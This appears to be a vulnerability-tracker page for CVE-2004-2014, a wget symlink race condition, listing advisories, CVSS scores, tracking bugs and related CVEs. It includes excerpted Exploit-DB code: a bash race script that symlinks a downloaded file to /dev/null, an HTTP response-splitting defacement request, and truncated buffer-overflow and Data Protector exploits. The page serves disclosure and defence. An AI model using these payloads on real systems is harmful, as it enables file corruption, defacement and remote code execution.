CVE-2004-2014
published 2004-12-31CVE-2004-2014: Wget 1.9 and 1.9.1 allows local users to overwrite arbitrary files via a symlink attack on the name of the file being downloaded.
PriorityP412low2.6CVSS 2.0
AVLACHAuNCNIPAP
EXPLOIT
EPSS
0.96%
57.5th percentile
Wget 1.9 and 1.9.1 allows local users to overwrite arbitrary files via a symlink attack on the name of the file being downloaded.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wget | < wget 1.9.1-12 (bookworm) | wget 1.9.1-12 (bookworm) |
| gnu | wget | — | — |
| gnu | wget | — | — |
| gnu | wget | — | — |
| gnu | wget | — | — |
| gnu | wget | — | — |
| gnu | wget | — | — |
| gnu | wget | — | — |
| gnu | wget | — | — |
| gnu | wget | — | — |
| gnu | wget | >= 0 < 1.9.1-12 | 1.9.1-12 |
| gnu | wget | >= 0 < 1.9.1-12 | 1.9.1-12 |
| gnu | wget | >= 0 < 1.9.1-12 | 1.9.1-12 |
| gnu | wget | >= 0 < 1.9.1-12 | 1.9.1-12 |
CVSS provenance
nvdv2.02.6LOWAV:L/AC:H/Au:N/C:N/I:P/A:P
osv2.6LOW
vendor_redhat10.0CRITICAL
vendor_debian2.6LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
php: use after free vulnerability in unserialize()
vendor_redhat·2014-12-18·CVSS 10.0
CVE-2014-8142 [CRITICAL] CWE-416 php: use after free vulnerability in unserialize()
php: use after free vulnerability in unserialize()
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before 5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019.
A flaws was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
Statement: This issue did not affect the versions of php as shipped with Red Hat Enterprise Linux 5 and 6 or the versions of php53 as shipped
Red Hat
mailx: command execution flaw
vendor_redhat·2014-12-16·CVSS 7.5
CVE-2014-7844 [HIGH] CWE-78 mailx: command execution flaw
mailx: command execution flaw
BSD mailx 8.1.2 and earlier allows remote attackers to execute arbitrary commands via a crafted email address.
A flaw was found in the way mailx handled the parsing of email addresses. A syntactically valid email address could allow a local attacker to cause mailx to execute arbitrary shell commands through shell meta-characters (CVE-2004-2771) and the direct command execution functionality (CVE-2014-7844).
Statement: Red Hat Enterprise Linux 5 is now in Production 3 Phase of the support and maintenance life cycle. This has been rated as having Moderate security impact and is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/
Red Hat
mailx: command execution flaw
vendor_redhat·2014-12-16·CVSS 7.5
CVE-2004-2771 [HIGH] CWE-78 mailx: command execution flaw
mailx: command execution flaw
The expand function in fio.c in Heirloom mailx 12.5 and earlier and BSD mailx 8.1.2 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in an email address.
A flaw was found in the way mailx handled the parsing of email addresses. A syntactically valid email address could allow a local attacker to cause mailx to execute arbitrary shell commands through shell meta-characters (CVE-2004-2771) and the direct command execution functionality (CVE-2014-7844).
Statement: Red Hat Enterprise Linux 5 is now in Production 3 Phase of the support and maintenance life cycle. This has been rated as having Moderate security impact and is not currently planned to be addressed in future updates. For additional information, refer to the R
Ubuntu
wget vulnerabilities
vendor_ubuntu·2005-06-28
CVE-2004-1487 wget vulnerabilities
Title: wget vulnerabilities
Summary: wget vulnerabilities
Jan Minar discovered a path traversal vulnerability in wget. If the
name ".." was a valid host name (which can be achieved with a
malicious or poisoned domain name server), it was possible to trick
wget into creating downloaded files into arbitrary locations with
arbitrary names. For example, wget could silently overwrite the users
~/.bashrc and other configuration files which are executed
automatically. (CAN-2004-1487)
Jan Minar also discovered that wget printed HTTP response strings from
the server to the terminal without any filtering. Malicious HTTP
servers could exploit this to send arbitrary terminal sequences and
strings which would then be executed and printed to the console. This
could potentially lead to arbitrary code
Red Hat
security flaw
vendor_redhat·2004-05-16·CVSS 2.6
CVE-2004-2014 [LOW] security flaw
security flaw
Wget 1.9 and 1.9.1 allows local users to overwrite arbitrary files via a symlink attack on the name of the file being downloaded.
Debian
CVE-2004-2014: wget - Wget 1.9 and 1.9.1 allows local users to overwrite arbitrary files via a symlink...
vendor_debian·2004·CVSS 2.6
CVE-2004-2014 [LOW] CVE-2004-2014: wget - Wget 1.9 and 1.9.1 allows local users to overwrite arbitrary files via a symlink...
Wget 1.9 and 1.9.1 allows local users to overwrite arbitrary files via a symlink attack on the name of the file being downloaded.
Scope: local
bookworm: resolved (fixed in 1.9.1-12)
bullseye: resolved (fixed in 1.9.1-12)
forky: resolved (fixed in 1.9.1-12)
sid: resolved (fixed in 1.9.1-12)
trixie: resolved (fixed in 1.9.1-12)
GHSA
GHSA-8ghf-v9f7-25jp: Wget 1
ghsa_unreviewed·2022-04-29
CVE-2004-2014 [LOW] GHSA-8ghf-v9f7-25jp: Wget 1
Wget 1.9 and 1.9.1 allows local users to overwrite arbitrary files via a symlink attack on the name of the file being downloaded.
OSV
CVE-2004-2014: Wget 1
osv·2004-12-31·CVSS 2.6
CVE-2004-2014 [LOW] CVE-2004-2014: Wget 1
Wget 1.9 and 1.9.1 allows local users to overwrite arbitrary files via a symlink attack on the name of the file being downloaded.
No detection rules found.
Exploit-DB
HP Data Protector A.09.00 - Arbitrary Command Execution
exploitdb·2016-05-26·CVSS 9.8
CVE-2016-2004 [CRITICAL] HP Data Protector A.09.00 - Arbitrary Command Execution
HP Data Protector A.09.00 - Arbitrary Command Execution
---
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
# This proof of concept demonstrates that enabling encrypted control communication on
# Data Protector agents does not provide any additional security.
# As is provides no authentication it is not a viable workaround to prevent the
# exploitation of well known Data Protector issues such as cve-2014-2623
#
# This exploit establishes and unauthenticated encrypted communication channel to
# a Data Protector Agent and
Exploit-DB
EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow
exploitdb·2014-05-12
CVE-2004-2466 EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow
EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow
---
## Exploit-DB Note: The offset to SEH is influenced by the installation path of the program.
## For this specific exploit to work, easy chat must be installed to:
## 'C:\Program Files\EFS Software\Easy Chat Server'
# Exploit Title: Easy Chat Server 3.1 stack buffer overflow
# Date: 9 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.echatserver.com/
# Software Link: http://www.echatserver.com/
# Version: 3.1
# Tested on: Windows 7 Enterprise SP1, English
#
# Description:
# A buffer overflow is triggered when when passing a long username.
import socket
import struct
# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-c
Exploit-DB
Snitz Forums 2000 - 'down.asp' HTTP Response Splitting
exploitdb·2004-09-16
CVE-2004-1687 Snitz Forums 2000 - 'down.asp' HTTP Response Splitting
Snitz Forums 2000 - 'down.asp' HTTP Response Splitting
---
source: https://www.securityfocus.com/bid/11201/info
Snitz Forums is reported prone to a HTTP response splitting vulnerability. The issue exists in a parameter of the 'down.asp' script. The issue presents itself due to a flaw in the affected script that allows an attacker to
manipulate how GET requests are handled.
A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted.
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}
(replace curly braces with less than and greater than symbols)
Exploit-DB
WGet 1.x - Insecure File Creation Race Condition
exploitdb·2004-05-17
CVE-2004-2014 WGet 1.x - Insecure File Creation Race Condition
WGet 1.x - Insecure File Creation Race Condition
---
source: https://www.securityfocus.com/bid/10361/info
The 'wget' utility has been reported prone to a race-condition vulnerability. The issue exists because wget doesn't lock files that it creates and writes to during file downloads.
A local attacker may exploit this condition to corrupt files with the privileges of the victim who is running the vulnerable version of wget.
#!/bin/bash
rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2
echo "1">salida.txt
a=`cat salida.txt`
echo "Waiting for Wget execution..."
while [ "$a" == 1 ]
do
ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt
a=`cat salida.txt`
done
echo "Process catched!"
pgrep -u root wget>pid.txt
ln -s /dev/null /tmp/patch-2.4.26.bz2
echo "/dev/null link created!"
ech
Nuclei
HP Data Protector - Arbitrary Command Execution
nuclei·CVSS 10.0
CVE-2016-2004 [CRITICAL] HP Data Protector - Arbitrary Command Execution
HP Data Protector - Arbitrary Command Execution
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
Template:
id: CVE-2016-2004
info:
name: HP Data Protector - Arbitrary Command Execution
author: pussycat0x
severity: critical
description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrar
Bugzilla
CVE-2004-2014 security flaw
bugzilla·2018-08-16·CVSS 2.6
CVE-2004-2014 [LOW] CVE-2004-2014 security flaw
CVE-2004-2014 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Wget 1.9 and 1.9.1 allows local users to overwrite arbitrary files via a symlink attack on the name of the file being downloaded.
Bugzilla
CVE-2004-2771 CVE-2014-7844 nail: mailx: command execution flaw [epel-5]
bugzilla·2014-12-17·CVSS 7.5
CVE-2004-2771 [HIGH] CVE-2004-2771 CVE-2014-7844 nail: mailx: command execution flaw [epel-5]
CVE-2004-2771 CVE-2014-7844 nail: mailx: command execution flaw [epel-5]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
epel-5 tracking bug for nail: see blocks bug list for fu
Bugzilla
CVE-2004-2771 CVE-2014-7844 mailx: command execution flaw
bugzilla·2014-11-11·CVSS 7.5
CVE-2004-2771 [HIGH] CVE-2004-2771 CVE-2014-7844 mailx: command execution flaw
CVE-2004-2771 CVE-2014-7844 mailx: command execution flaw
Florian Weimer from Red Hat has reported the below issue:
mailx executes shell commands embedded in syntactically valid mail addresses due a not quoted command to prevent word expansion.
fio.c
542 }
543 snprintf(cmdbuf, sizeof cmdbuf, "echo %s", name);
544 if ((shell = value("SHELL")) == NULL)
545 shell = SHELL;
The original report in Debian bugtracker:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=278748
Discussion:
Created attachment 958222
0001-outof-Introduce-expandaddr-flag.patch
---
Created attachment 958223
0002-unpack-Disable-option-processing-for-email-addresses.patch
---
Created attachment 958224
0003-fio.c-Unconditionally-require-wordexp-support.patch
---
Created attachment 958225
0004-globname-Invoke-wor
http://marc.info/?l=bugtraq&m=108481268725276&w=2http://marc.info/?l=wget&m=108482747906833&w=2http://marc.info/?l=wget&m=108483270227139&w=2http://secunia.com/advisories/17399http://www.mandriva.com/security/advisories?name=MDKSA-2005:204http://www.redhat.com/support/errata/RHSA-2005-771.htmlhttp://www.securityfocus.com/bid/10361https://exchange.xforce.ibmcloud.com/vulnerabilities/16167https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9830https://usn.ubuntu.com/145-1/http://marc.info/?l=bugtraq&m=108481268725276&w=2http://marc.info/?l=wget&m=108482747906833&w=2http://marc.info/?l=wget&m=108483270227139&w=2http://secunia.com/advisories/17399http://www.mandriva.com/security/advisories?name=MDKSA-2005:204http://www.redhat.com/support/errata/RHSA-2005-771.htmlhttp://www.securityfocus.com/bid/10361https://exchange.xforce.ibmcloud.com/vulnerabilities/16167https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9830https://usn.ubuntu.com/145-1/
2004-12-31
Published